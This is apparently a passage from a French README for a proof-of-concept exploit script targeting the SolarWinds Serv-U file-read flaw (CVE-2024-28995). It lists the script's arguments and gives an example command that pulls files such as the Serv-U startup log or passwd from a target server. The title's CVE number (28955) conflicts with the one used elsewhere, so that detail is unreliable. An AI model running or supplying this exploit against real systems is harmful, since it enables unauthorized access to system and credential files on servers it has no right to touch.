
CVE-2024-28955 PoC d'exploitation
15.4.2 ou inférieure).Pour utiliser cet outil, vous devez avoir Python installé. Exécutez le script avec les arguments appropriés :
python3 CVE-2024-28995.py -u <URL> [-d <Directory Path>] [-f <File Name>] [-w <Wordlist>]
-u, --url: URL à exploiter (obligatoire).
-d, --dir: Chemin du répertoire pour la lecture de fichier (par ex., ProgramData/RhinoSoft/Serv-U/).
-f, --file: Fichier à lire pour la lecture de fichier (par ex., Serv-U-StartupLog.txt ou passwd).
-w, --wordlist: Liste de mots pour des chemins supplémentaires à tester.
Exemple
python3 CVE-2024-28995.py -u http://example.com -d ProgramData/RhinoSoft/Serv-U/ -f Serv-U-StartupLog.txt



Références
https://www.labs.greynoise.io/grimoire/2024-06-solarwinds-serv-u/